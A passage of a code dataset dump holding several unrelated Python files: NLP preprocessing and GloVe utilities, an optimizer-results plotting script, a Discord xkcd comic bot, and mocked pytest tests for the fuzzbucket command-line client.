not sure why quotes are not handled inconsistently by spacy\r\n text = text.replace('\"', ' ')\r\n \r\n doc = nlp(text)\r\n \r\n words = [w for w in doc if not w.is_space and not w.is_bracket and not w.is_punct]\r\n if opt['dataset']['text_pp_remove_stop_words']:\r\n words = [w for w in words if not w.is_stop ]\r\n \r\n if opt['dataset']['text_pp_lemmatization']:\r\n words = [w.lemma_ if w.lemma_ != '-PRON-' else w.lower_ for w in words]\r\n else:\r\n words = [w.lower_ for w in words]\r\n \r\n words = [normalize_text(w) for w in words]\r\n return words\r\n\r\ndef cleanup_punctuation(text):\r\n doc = nlp(text)\r\n words = [w for w in doc if not w.is_space and not w.is_bracket and not w.is_punct]\r\n words = [w.lower_ for w in words]\r\n return ' '.join(words)\r\n\r\n#build or extend vocabulary\r\ndef build_vocabulary(documents, vocabulary=None, glove_vocabulary=None):\r\n if vocabulary is None:\r\n vocabulary = {'words': {'': {'count': 0, 'id': 0}, '': {'count': 0, 'id': 1}}, 'ids': ['', ''], 'words_ignored': {}}\r\n\r\n for document in documents:\r\n for word in document:\r\n if word not in vocabulary['words']:\r\n if glove_vocabulary == None:\r\n vocabulary['words'][word] = {'count': 0, 'id': len(vocabulary['words'])}\r\n vocabulary['ids'].append(word)\r\n else:\r\n if word in glove_vocabulary:\r\n vocabulary['words'][word] = {'count': 0, 'id': len(vocabulary['words'])}\r\n vocabulary['ids'].append(word)\r\n if word in vocabulary['words']:\r\n vocabulary['words'][word]['count'] = vocabulary['words'][word]['count'] + 1\r\n else:\r\n if word not in vocabulary['words_ignored']:\r\n vocabulary['words_ignored'][word] = 0\r\n vocabulary['words_ignored'][word] += 1\r\n\r\n return vocabulary\r\n\r\ndef words2ids(opt, words, vocabulary):\r\n #word not in vocabulary if\r\n #a. test set\r\n #b. 
word not in glove\r\n #unknown can be\r\n #'ignore'\r\n #'unknown_id'\r\n #'fail'\r\n if opt['dataset']['word_embedding'] == 'fail':\r\n return [vocabulary['words'][word]['id'] for word in words]\r\n elif opt['dataset']['word_embedding'] == 'unknown_id':\r\n return [vocabulary['words'][word]['id'] if word in vocabulary['words'] else opt['dataset']['vocabulary_unknown_id'] for word in words]\r\n else:\r\n return [vocabulary['words'][word]['id'] for word in words if word in vocabulary['words']]\r\n \r\nELMO_PAD_CHAR = 260\r\nELMO_BOW_CHAR = 258\r\nELMO_EOW_CHAR = 259\r\n\r\n#ReceiptCNN.word_padded_len = 25\r\ndef Word2CharIds(word):\r\n chars = []\r\n if len(word) > 0:\r\n chars += [ELMO_BOW_CHAR]\r\n chars += list(word.encode('utf-8', errors='ignore'))\r\n chars += [ELMO_EOW_CHAR]\r\n \r\n if len(chars) > 25:\r\n chars = chars[:25]\r\n\r\n if len(chars) < 25:\r\n chars = chars + [ELMO_PAD_CHAR] * (25 - len(chars))\r\n\r\n charIds = [int(x) for x in chars]\r\n return charIds\r\n\r\ndef words2chars(words):\r\n return [Word2CharIds(word) for word in words]\r\n\r\nimport os\r\nimport sys\r\nsys.path.append('/home/nlp/shared')\r\n#from hutils import DBG\r\n\r\nglove_vocab = {}\r\n\r\ndef load_glove_vocabulary(opt):\r\n global glove_vocab\r\n vocabulary = set()\r\n base_fname = opt['trainer']['glove_file'].replace('.txt', '')\r\n glove_vocab = {}\r\n # try to fast load\r\n if os.path.isfile(base_fname + '.vocab.txt'):\r\n with open(base_fname + '.vocab.txt', 'r', encoding=\"utf8\") as f:\r\n for line in f:\r\n vline = line.strip().split()\r\n if len(vline) != 2:\r\n continue\r\n token, offs = vline\r\n glove_vocab[token] = offs\r\n vocabulary = set(glove_vocab.keys())\r\n else:\r\n with open(opt['trainer']['glove_file'], 'rb') as f:\r\n offs = 0\r\n for line in f:\r\n elems = line.decode('utf8').strip().split()\r\n token = normalize_text(''.join(elems[0:-opt['trainer']['glove_dim']]))\r\n vocabulary.add(token)\r\n glove_vocab[token] = offs\r\n offs += len(line)\r\n # memoize list of words and offsets\r\n with open(base_fname + '.vocab.txt', 'w', encoding=\"utf8\") as f:\r\n for token, offs in glove_vocab.items():\r\n f.write(token + ' ' + str(offs) + '\\n')\r\n return vocabulary\r\n\r\n#def load_glove_vocabulary(opt):\r\n# vocabulary = set()\r\n# with open(opt['trainer']['glove_file'], encoding=\"utf8\") as f:\r\n# for line in f:\r\n# elems = line.split()\r\n# token = normalize_text(''.join(elems[0:-opt['trainer']['glove_dim']]))\r\n# vocabulary.add(token)\r\n# return vocabulary\r\n\r\ndef build_embeddings(opt, vocabulary):\r\n vocabulary_size = len(vocabulary['words'])\r\n embeddings = np.random.uniform(-1, 1, (vocabulary_size, opt['trainer']['glove_dim']))\r\n embeddings[0] = 0 # should be all 0 (using broadcast)\r\n\r\n with open(opt['trainer']['glove_file'], encoding=\"utf8\") as f:\r\n # fast load embeddings\r\n for token in vocabulary['words']:\r\n if token in glove_vocab:\r\n offs = int(glove_vocab[token])\r\n f.seek(offs)\r\n line = f.readline().strip()\r\n elems = line.split()\r\n token2 = normalize_text(''.join(elems[0:-opt['trainer']['glove_dim']]))\r\n assert token == token2\r\n if token in vocabulary['words']:\r\n embeddings[vocabulary['words'][token]['id']] = [float(v) for v in elems[-opt['trainer']['glove_dim']:]]\r\n return embeddings\r\n\r\nlast_timestamp = None\r\ndef time_delta():\r\n global last_timestamp\r\n now = datetime.datetime.now()\r\n now_str = re.sub(r'\\.[0-9]+$', '', str(now))\r\n if last_timestamp == None:\r\n delta = ''\r\n else:\r\n delta = now - 
last_timestamp\r\n delta = ' [delta=' + str(delta.seconds)+'s]'\r\n last_timestamp = now\r\n return now_str + delta\r\n\r\ndef levenshtein(s1, s2):\r\n if len(s1) < len(s2):\r\n return levenshtein(s2, s1)\r\n\r\n # len(s1) >= len(s2)\r\n if len(s2) == 0:\r\n return len(s1)\r\n\r\n previous_row = range(len(s2) + 1)\r\n for i, c1 in enumerate(s1):\r\n current_row = [i + 1]\r\n for j, c2 in enumerate(s2):\r\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\r\n deletions = current_row[j] + 1 # than s2\r\n substitutions = previous_row[j] + (c1 != c2)\r\n current_row.append(min(insertions, deletions, substitutions))\r\n previous_row = current_row\r\n \r\n return previous_row[-1]\r\n\r\ndef levenshtein_score(a, b, threshold=0):\r\n if len(a) == 0 and len(b) == 0: return 1\r\n score = (max(len(a), len(b)) - levenshtein(a.lower(), b.lower()))/max(len(a), len(b))\r\n if score < threshold: score = 0\r\n return score\r\n\r\ndef is_valid_date(date_string, use_dateparser=True):\r\n if get_date(date_string) is None:\r\n return False \r\n return True\r\n\r\ndef get_date(date_string, base_date=None, use_dateParser=True): \r\n if base_date is None:\r\n base_date = datetime.datetime.now()\r\n\r\n try:\r\n date = parser.parse(date_string, default = base_date)\r\n if date is not None:\r\n return date\r\n except: \r\n pass \r\n \r\n if use_dateParser:\r\n try: \r\n date = dateparser.parse(date_string, settings={'STRICT_PARSING': True,'RELATIVE_BASE':base_date}, languages=[\"en\"]) \r\n if date is not None:\r\n return date\r\n except: \r\n pass \r\n\r\n return None\r\n","sub_path":"PyTest/Common/nlputil.py","file_name":"nlputil.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1864563","text":"import pandas as pd\nimport numpy as np\nimport os\nimport matplotlib\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use(\"seaborn\")\nfrom pypet import Trajectory\nimport itertools as it\nfrom matplotlib.lines import Line2D\n\nRESULTS_PATH = \"/home/simon/Documents/NAIVI/results/\"\nFIGS_PATH = \"/home/simon/Documents/NAIVI/results/figs/\"\nEXP_NAME = \"optimizer\"\n\ntraj = Trajectory(EXP_NAME, add_time=False)\ntraj.f_load(filename=RESULTS_PATH + EXP_NAME + \".hdf5\", force=True)\ntraj.v_auto_load = True\n\nparms = traj.res.summary.hyperparameters.df\nns = parms[(\"data\", \"N\")].unique()\nps = parms[(\"data\", \"p_cts\")].unique()\nexps = list(it.product(ns, ps))\noptimizers = parms[(\"fit\", \"optimizer\")].unique()\ncols = [matplotlib.colors.to_hex(col) for col in sns.color_palette(\"Set2\", len(optimizers))]\ncolors = {\n name: col for name, col in zip(optimizers, cols)\n}\nmetrics = {\n (\"train\", \"loss\"): \"(Training loss - min)/min\",\n (\"train\", \"grad_Linfty\"): \"Linfty(grad)\",\n (\"train\", \"grad_L1\"): \"L1(grad)\",\n (\"train\", \"grad_L2\"): \"L2(grad)\",\n (\"train\", \"mse\"): \"(Training MSE - min)/min\",\n (\"train\", \"auc_A\"): \"(max - Training AUC)\",\n (\"error\", \"BBt\"): \"MSE(BBt)\",\n (\"error\", \"Theta_X\"): \"MSE(Theta_X)\",\n (\"error\", \"ZZt\"): \"MSE(ZZt)\",\n (\"error\", \"alpha\"): \"MSE(alpha)\",\n (\"error\", \"Theta_A\"): \"MSE(Theta_A)\",\n (\"error\", \"P\"): \"MSE(P)\",\n}\n\n# Plot\nfig, axs = plt.subplots(len(metrics), len(exps), figsize=(15, 20), sharey=\"row\", sharex=\"col\")\nfor col, (N, p_cts) in enumerate(exps):\n\truns = parms.loc[(parms[(\"data\", \"N\")]==N) & 
(parms[(\"data\", \"p_cts\")]==p_cts)].index\n\tmin_loss = np.inf\n\tmin_mse = np.inf\n\tmax_auc = 0.\n\tfor idx in runs:\n\t\ttraj.f_set_crun(idx)\n\t\tmin_loss = min(min_loss, traj.res.logs.crun.df[(\"train\", \"loss\")].min())\n\t\tmin_mse = min(min_mse, traj.res.logs.crun.df[(\"train\", \"mse\")].min())\n\t\tmax_auc = max(max_auc, traj.res.logs.crun.df[(\"train\", \"auc_A\")].max())\n\tfor row, (metric, display) in enumerate(metrics.items()):\n\t\tax = axs[row][col]\n\t\tfor idx in runs:\n\t\t\ttraj.f_set_crun(idx)\n\t\t\tm = traj.res.logs.crun.df[metric]\n\t\t\tif metric == (\"train\", \"loss\"):\n\t\t\t\tm = (m - min_loss) / min_loss\n\t\t\tif metric == (\"train\", \"mse\"):\n\t\t\t\tm = (m - min_mse) / min_mse\n\t\t\tif metric == (\"train\", \"auc_A\"):\n\t\t\t\tm = max_auc - m\n\t\t\tax.plot(m, color=colors[parms.loc[idx, (\"fit\", \"optimizer\")]])\n\t\tif col == 0:\n\t\t\tax.set_yscale(\"log\")\n\t\t\tax.set_ylabel(display)\n\taxs[-1][col].set_xscale(\"log\")\n\taxs[0][col].set_title(f\"N={N}, p={p_cts}\")\n# legend\nlines = [Line2D([0], [0], color=col, linestyle=\"-\")\n for _, col in colors.items()]\nlabels = colors.keys()\nfig.legend(lines, labels, loc=8, ncol=len(colors))\nfig.tight_layout()\nfig.subplots_adjust(bottom=0.05)\nfig.savefig(FIGS_PATH + \"optimizer.pdf\")\n","sub_path":"NAIVI_experiments/analysis/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92664697","text":"import json\nimport urllib.request as ureq\nimport discord, asyncio, random, datetime, difflib\nfrom src.utils import Log, ErrorHandler\nfrom src.loadingmessage import LoadingMessage\n\nclass xkcd:\n def __init__(self, num = ''): \n if num.lower() == 'random':\n self.num = random.randrange(1, xkcd('').num)\n elif str(num).isnumeric() or num == '':\n self.num = num\n elif num.lower() == 'latest':\n self.num = xkcd('').num\n else:\n raise ValueError\n \n self.url = 'https://xkcd.com/' + str(self.num)\n \n mdata = json.load(ureq.urlopen(self.url + '/info.0.json'))\n self.date = datetime.datetime(int(mdata['year']), int(mdata['month']), int(mdata['day']))\n self.img_url = mdata['img']\n self.title = mdata['title']\n self.alt = mdata['alt']\n self.num = mdata['num']\n\nclass XKCDSearch:\n @staticmethod\n async def search(bot, ctx, searchQuery, message):\n errorCount = 0\n while errorCount <= 1:\n try:\n x = xkcd(searchQuery)\n embed = discord.Embed(title=x.title, description=x.alt, timestamp=x.date)\n embed.url = x.url\n embed.set_image(url=x.img_url)\n embed.set_footer(text=f\"Requested by {ctx.author}\")\n\n await message.edit(content=None, embed=embed)\n Log.appendToLog(ctx, f\"{ctx.command} result\", x.url)\n\n await message.add_reaction('🗑️')\n reaction, user = await bot.wait_for(\"reaction_add\", check=lambda reaction, user: all([user == ctx.author, str(reaction.emoji) == \"🗑️\", reaction.message == message]), timeout=60)\n if str(reaction.emoji) == '🗑️':\n await message.delete()\n return\n\n except UserCancel as e:\n await ctx.send(f\"Cancelled\")\n return\n\n except ValueError:\n errorMsg = await ctx.send(\"Invalid input, an XKCD comic number is needed. 
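# The xkcd helper above builds on the comic's public JSON endpoint; the same
# metadata can be fetched directly (comic number 614 chosen arbitrarily):
import json
import urllib.request as ureq

with ureq.urlopen('https://xkcd.com/614/info.0.json') as resp:
    meta = json.load(resp)
print(meta['title'], meta['img'])   # comic title and image URL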
Please edit your search or try again.\")\n\n messageEdit = asyncio.create_task(bot.wait_for('message_edit', check=lambda var, m: m.author == ctx.author, timeout=60))\n reply = asyncio.create_task(bot.wait_for('message', check=lambda m: m.author == ctx.author, timeout=60))\n \n waiting = [messageEdit, reply]\n done, waiting = await asyncio.wait(waiting, return_when=asyncio.FIRST_COMPLETED) # 30 seconds wait either reply or react\n if messageEdit in done:\n reply.cancel()\n messageEdit = messageEdit.result()\n searchQuery = ''.join([li for li in difflib.ndiff(messageEdit[0].content, messageEdit[1].content) if '+' in li]).replace('+ ', '')\n elif reply in done:\n messageEdit.cancel()\n reply = reply.result()\n await reply.delete()\n \n if reply.content == \"cancel\":\n messageEdit.cancel()\n reply.cancel()\n break\n else: searchQuery = reply.content\n await errorMsg.delete()\n errorCount += 1\n continue\n\n except asyncio.TimeoutError:\n return\n \n except asyncio.CancelledError:\n pass\n\n except Exception as e:\n await ErrorHandler(bot, ctx, e, searchQuery)\n return\n\nclass UserCancel(Exception):\n pass\n","sub_path":"src/xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"23774980","text":"import argparse\nimport contextlib\nimport io\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport urllib.request\n\nimport pytest\n\nimport fuzzbucket_client.__main__\n\n\n@pytest.fixture(autouse=True)\ndef config_setup(tmpdir, monkeypatch):\n url = f\"http://fuzzbucket.example.org/bleep/bloop/dev/{random.randint(42, 666)}\"\n fake_home = tmpdir.join(\"home\")\n fake_home.mkdir().mkdir(\".cache\").mkdir(\"fuzzbucket\").join(\n \"credentials\"\n ).write_text(f'[server \"{url}\"]\\ncredentials = whimsy:doodles\\n', \"utf-8\")\n monkeypatch.setenv(\"HOME\", str(fake_home))\n monkeypatch.setenv(\"FUZZBUCKET_URL\", url)\n\n\ndef test_default_client():\n assert fuzzbucket_client.__main__.default_client() is not None\n\n\ndef test_client_setup():\n client = fuzzbucket_client.__main__.Client()\n client._setup()\n assert client is not None\n\n client._env.pop(\"FUZZBUCKET_URL\")\n with pytest.raises(ValueError):\n client._setup()\n\n client._env[\"FUZZBUCKET_URL\"] = \"not none\"\n client._cached_credentials = None\n os.remove(client._credentials_file)\n with pytest.raises(ValueError):\n client._setup()\n\n\ndef gen_fake_urlopen(response, http_exc=None, empty_methods=()):\n @contextlib.contextmanager\n def fake_urlopen(request):\n if request.get_method() in empty_methods:\n yield io.StringIO(\"\")\n return\n if http_exc is not None:\n raise urllib.request.HTTPError(*(list(http_exc) + [response]))\n yield response\n\n return fake_urlopen\n\n\n@pytest.mark.parametrize(\n (\"errors\", \"log_level\", \"log_matches\", \"out_matches\", \"expected\"),\n [\n pytest.param((), logging.INFO, (), (), True, id=\"happy\"),\n pytest.param(\n (\"setup\",),\n logging.INFO,\n (\"command.+failed err=.+setup error\",),\n (),\n False,\n id=\"setup_err\",\n ),\n pytest.param(\n (\"setup_auth\",),\n logging.INFO,\n (\n \"command.+failed err=No credentials found for \"\n + \"url='http://nope' in file='/some/hecking/place'\",\n ),\n (\n \"^Please run the following command\",\n \"to grant access to Fuzzbucket\",\n \"fuzzbucket-client login\",\n ),\n False,\n id=\"setup_auth_err\",\n ),\n pytest.param(\n (\"method\",),\n logging.INFO,\n (\"command.+failed err=.+method error\",),\n (),\n 
False,\n id=\"method_err\",\n ),\n pytest.param(\n (\"http\",),\n logging.INFO,\n (\"command.+failed err=.+http error\",),\n (),\n False,\n id=\"http_err\",\n ),\n pytest.param(\n (\"http_auth\",),\n logging.INFO,\n (\"command.+failed err=.+http_auth error\",),\n (\n \"^Please run the following command\",\n \"to grant access to Fuzzbucket\",\n \"fuzzbucket-client login\",\n ),\n False,\n id=\"http_auth_err\",\n ),\n pytest.param(\n (\"http\", \"json\"),\n logging.INFO,\n (\"command.+failed err=.+json error\",),\n (),\n False,\n id=\"http_json_err\",\n ),\n pytest.param(\n (\"http\", \"json\"),\n logging.DEBUG,\n (\n \"command.+failed\",\n \"Traceback \\\\(most recent call last\\\\):\",\n \"ValueError: json error\",\n ),\n (),\n False,\n id=\"http_json_err\",\n ),\n ],\n)\ndef test_command_decorator(\n monkeypatch, caplog, capsys, errors, log_level, log_matches, out_matches, expected\n):\n class FakeClient:\n def _setup(self):\n if \"setup_auth\" in errors:\n raise fuzzbucket_client.__main__.CredentialsError(\n \"http://nope\", \"/some/hecking/place\"\n )\n if \"setup\" in errors:\n raise ValueError(\"setup error\")\n\n def fake_method(self, known_args, unknown_args):\n if \"method\" in errors:\n raise ValueError(\"method error\")\n if \"http\" in errors:\n raise urllib.request.HTTPError(\"http://nope\", 599, \"ugh\", [], None)\n if \"http_auth\" in errors:\n raise urllib.request.HTTPError(\"http://nope\", 403, \"no\", [], None)\n return True\n\n def fake_load(fp):\n if \"json\" in errors:\n raise ValueError(\"json error\")\n if \"http_auth\" in errors:\n return {\"error\": \"http_auth error\"}\n return {\"error\": \"http error\"}\n\n caplog.set_level(log_level)\n monkeypatch.setattr(fuzzbucket_client.__main__, \"log_level\", lambda: log_level)\n monkeypatch.setattr(json, \"load\", fake_load)\n decorated = fuzzbucket_client.__main__._command(fake_method)\n assert decorated(FakeClient(), \"known\", \"unknown\") == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text) is not None\n captured = capsys.readouterr()\n for out_match in out_matches:\n assert re.search(out_match, captured.out, re.MULTILINE) is not None\n\n\ndef test_client_version(capsys):\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\", \"--version\"])\n assert ret == 0\n captured = capsys.readouterr()\n assert re.match(\"fuzzbucket-client .+\", captured.out) is not None\n\n\ndef test_client_no_func(capsys):\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\"])\n assert ret == 2\n captured = capsys.readouterr()\n for match in (\n \"^usage: .+--version.+\",\n \"^A client for fuzzbucket\",\n \"^optional arguments:\",\n \"^ +delete-alias.+delete an image alias\",\n ):\n assert re.search(match, captured.out, re.MULTILINE) is not None\n\n\ndef test_client_failing_func(monkeypatch, capsys):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(client, \"list\", lambda _, __: False)\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\", \"list\"])\n assert ret == 86\n\n\n@pytest.mark.parametrize(\n (\"args\",),\n [\n pytest.param((\"list\",), id=\"empty\"),\n pytest.param((\"-j\", \"list\"), id=\"output_json\"),\n ],\n)\ndef test_client_list(monkeypatch, args):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(\n io.StringIO(\n 
json.dumps({\"boxes\": [{\"name\": \"sparkles\", \"fancy\": \"probably\"}]})\n )\n ),\n )\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\"] + list(args))\n assert ret == 0\n\n\n@pytest.mark.parametrize(\n (\"user\", \"secrets\", \"url\", \"raises\", \"written\", \"expected\"),\n [\n pytest.param(\n \"bugs\",\n (\"wonketywoopwoopwoopwoopwoopwoopwoopwoopwoo\",),\n \"http://sure.example.org\",\n False,\n (\"bugs\", \"wonketywoopwoopwoopwoopwoopwoopwoopwoopwoo\"),\n 0,\n id=\"happy\",\n ),\n pytest.param(\n \"elmer\",\n (\":typing:\", \"9ccb489abe5c900316fd57482b23c38bb99c727900\"),\n \"https://vewwyquiet.jobs\",\n False,\n (\"elmer\", \"9ccb489abe5c900316fd57482b23c38bb99c727900\"),\n 0,\n id=\"eventually_happy\",\n ),\n pytest.param(\n \"wylie\",\n (\"femmeroadrunner???\",),\n \"https://shop.acme.com\",\n True,\n (),\n 86,\n id=\"interrupted\",\n ),\n pytest.param(\n \"speedy\", (\"I am more than a stereotype\",), None, False, (), 86, id=\"no_url\"\n ),\n ],\n)\ndef test_client_login(\n monkeypatch, capsys, user, secrets, url, raises, written, expected\n):\n state = {\"secret_count\": 0}\n\n def fake_write_credentials(user, secret):\n state.update(user=user, secret=secret)\n\n def fake_getpass(prompt):\n state.update(prompt=prompt)\n ret = secrets[state[\"secret_count\"]]\n state[\"secret_count\"] += 1\n if raises:\n raise KeyboardInterrupt(\"control this\")\n return ret\n\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(fuzzbucket_client.__main__.webbrowser, \"open\", lambda u: None)\n monkeypatch.setattr(fuzzbucket_client.__main__.getpass, \"getpass\", fake_getpass)\n monkeypatch.setattr(client, \"_write_credentials\", fake_write_credentials)\n client._env[\"FUZZBUCKET_URL\"] = url\n\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\", \"login\", user])\n assert ret == expected\n captured = capsys.readouterr()\n if url is not None:\n assert \"Attempting to open the following URL\" in captured.out\n if len(secrets) > 1:\n assert \"Invalid secret provided\" in captured.out\n if raises or url is None:\n return\n assert (state.get(\"user\"), state.get(\"secret\")) == written\n assert \"Login successful\" in captured.out\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"http_exc\", \"cmd_args\", \"log_matches\", \"expected\"),\n [\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"ubuntu49\",\n \"public_ip\": None,\n \"special\": \"like all the others\",\n }\n ]\n },\n None,\n (\n \"ubuntu49\",\n \"--connect\",\n ),\n (\"created box for user=.+\",),\n 0,\n id=\"happy_alias\",\n ),\n pytest.param(\n {\n \"boxes\": [\n {\"name\": \"snowflek\", \"public_ip\": None, \"worth\": \"immeasurable\"}\n ]\n },\n None,\n (\"ami-fafbafabcadabfabcdabcbaf\", \"--instance-type=t8.nano\"),\n (\"created box for user=.+\",),\n 0,\n id=\"happy_ami\",\n ),\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"ubuntu49\",\n \"public_ip\": \"256.256.0.-1\",\n \"special\": \"like the one before\",\n }\n ]\n },\n (\n \"http://fake\",\n 409,\n \"you already did this\",\n [(\"Content-Type\", \"application/json\")],\n ),\n (\n \"ubuntu49\",\n \"--instance-type=t8.pico\",\n \"--connect\",\n ),\n (\"matching box already exists\",),\n 0,\n id=\"repeat_alias\",\n ),\n pytest.param(\n {\"error\": \"not today\"},\n (\n \"http://fake\",\n 500,\n \"just cannot\",\n [(\"Content-Type\", \"application/json\")],\n ),\n (\n \"ubuntu49\",\n \"--instance-type=t8.pico\",\n \"--connect\",\n ),\n 
(\"command [\\\"']create[\\\"'] failed\",),\n 86,\n id=\"api_err\",\n ),\n ],\n)\ndef test_client_create(\n monkeypatch, caplog, api_response, http_exc, cmd_args, log_matches, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO(json.dumps(api_response)), http_exc=http_exc),\n )\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"create\"] + list(cmd_args)\n )\n assert ret == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text) is not None\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"http_exc\", \"cmd_args\", \"log_matches\", \"expected\"),\n [\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"welp\",\n \"public_ip\": None,\n \"instance_id\": \"i-fafafafafaf\",\n \"special\": \"is this the end\",\n },\n {\n \"name\": \"welpington\",\n \"public_ip\": None,\n \"instance_id\": \"i-fafafababab\",\n },\n ]\n },\n None,\n (\"welp*\",),\n (\"deleted box for.+name=welp$\", \"deleted box for.+name=welpington$\"),\n 0,\n id=\"happy\",\n ),\n pytest.param(\n {\"boxes\": []},\n None,\n (\"welp*\",),\n (\"no boxes found matching [\\\"']welp\\\\*[\\\"']\",),\n 86,\n id=\"no_match\",\n ),\n ],\n)\ndef test_client_delete(\n monkeypatch, caplog, api_response, http_exc, cmd_args, log_matches, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(\n io.StringIO(json.dumps(api_response)),\n http_exc=http_exc,\n empty_methods=(\"DELETE\",),\n ),\n )\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"delete\"] + list(cmd_args)\n )\n assert ret == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text, re.MULTILINE)\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"http_exc\", \"cmd_args\", \"log_matches\", \"expected\"),\n [\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"zombie-skills\",\n \"public_ip\": None,\n \"instance_id\": \"i-fafafafafaf\",\n \"brainzzz\": \"eating\",\n }\n ]\n },\n None,\n (\"zombie-skills\",),\n (\"rebooted box for user=.+ box=[\\\"']zombie-skills[\\\"']\",),\n 0,\n id=\"happy\",\n ),\n pytest.param(\n {\"boxes\": []},\n None,\n (\"nessie\",),\n (\"no box found matching [\\\"']nessie[\\\"']\",),\n 86,\n id=\"no_match\",\n ),\n pytest.param(\n {\"error\": \"ker-splatz\"},\n (\"http://nah\", 586, \"owwie\", []),\n (\"whoopie-pie\",),\n (\"command [\\\"']reboot[\\\"'] failed err=[\\\"']ker-splatz[\\\"']\",),\n 86,\n id=\"api_err\",\n ),\n ],\n)\ndef test_client_reboot(\n monkeypatch, caplog, api_response, http_exc, cmd_args, log_matches, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(\n io.StringIO(json.dumps(api_response)),\n http_exc=http_exc,\n empty_methods=(\"POST\",),\n ),\n )\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"reboot\"] + list(cmd_args)\n )\n assert ret == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text, re.MULTILINE)\n\n\ndef test_client_ssh(monkeypatch):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n def 
fake_execvp(file, args):\n assert file == \"ssh\"\n assert args == [\n \"ssh\",\n \"ethereal-plane.example.org\",\n \"-o\",\n \"UserKnownHostsFile=/dev/null\",\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-l\",\n \"ubuntu\",\n \"ls\",\n \"-la\",\n ]\n\n def fake_list_boxes():\n return [{\"name\": \"koolthing\", \"public_dns_name\": \"ethereal-plane.example.org\"}]\n\n monkeypatch.setattr(os, \"execvp\", fake_execvp)\n monkeypatch.setattr(client, \"_list_boxes\", fake_list_boxes)\n\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"ssh\", \"koolthing\", \"ls\", \"-la\"]\n )\n assert ret == 0\n\n\ndef test_client_scp(monkeypatch):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n def fake_execvp(file, args):\n assert file == \"scp\"\n assert args == [\n \"scp\",\n \"-o\",\n \"UserKnownHostsFile=/dev/null\",\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-r\",\n \"cornelius@ethereal-plane.example.org:/var/log/\",\n \"./local/dump\",\n ]\n\n def fake_list_boxes():\n return [{\"name\": \"koolthing\", \"public_dns_name\": \"ethereal-plane.example.org\"}]\n\n monkeypatch.setattr(os, \"execvp\", fake_execvp)\n monkeypatch.setattr(client, \"_list_boxes\", fake_list_boxes)\n\n ret = fuzzbucket_client.__main__.main(\n [\n \"fuzzbucket-client\",\n \"scp\",\n \"koolthing\",\n \"-r\",\n \"cornelius@__BOX__:/var/log/\",\n \"./local/dump\",\n ]\n )\n assert ret == 0\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"data_format\", \"stdout_match\", \"expected\"),\n [\n pytest.param(\n {\"image_aliases\": {\"chonk\": \"ami-fafababacaca\", \"wee\": \"ami-0a0a0a0a0a\"}},\n fuzzbucket_client.__main__._DataFormats.INI,\n \"(chonk = ami-fafababacaca|wee = ami-0a0a0a0a0a)\",\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"image_aliases\": {\"chonk\": \"ami-fafababacaca\", \"wee\": \"ami-0a0a0a0a0a\"}},\n fuzzbucket_client.__main__._DataFormats.JSON,\n '(\"chonk\": \"ami-fafababacaca\"|\"wee\": \"ami-0a0a0a0a0a\")',\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"error\": \"oh no\"},\n fuzzbucket_client.__main__._DataFormats.INI,\n None,\n False,\n id=\"err\",\n ),\n ],\n)\ndef test_client_list_aliases(\n 